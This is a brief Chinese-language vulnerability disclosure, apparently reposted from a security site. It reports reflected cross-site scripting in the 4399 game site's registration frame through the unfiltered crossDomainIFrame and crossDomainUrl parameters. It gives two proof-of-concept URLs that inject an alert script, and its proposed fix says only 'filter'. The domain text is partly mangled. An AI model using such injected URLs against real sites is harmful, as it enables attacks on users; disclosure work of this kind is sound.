没对参数进行过滤。crossDomainIFrame与crossDomainUrl两处参数可进行修改。
漏洞 证明:
http://ptlogin.4399测试数据/ptlogin/regFrame.do?manualReg=true&postLoginHandler=refreshParent&redirectUrl=&displayMode=embed&css=http%3A%2F%2Fs4.img4399测试数据%2Fm%2Fstyle%2Fptlogin_login.css&appId=my&gameId=®Idcard=true&mainDivId=popup_reg_div&crossDomainUrl=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E HdhCmsTest2cto测试数据
http://ptlogin.4399测试数据/ptlogin/regFrame.do?manualReg=true&postLoginHandler=refreshParent&redirectUrl=&displayMode=embed&css=http%3A%2F%2Fs4.img4399测试数据%2Fm%2Fstyle%2Fptlogin_login.css&appId=my&gameId=®Idcard=true&mainDivId=popup_reg_div&crossDomainIFrame=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
修复方案:
过滤....
作者:QQ852451559
查看更多关于4399小游戏注册处存在跨站及修复方案 - 网站安全的详细内容...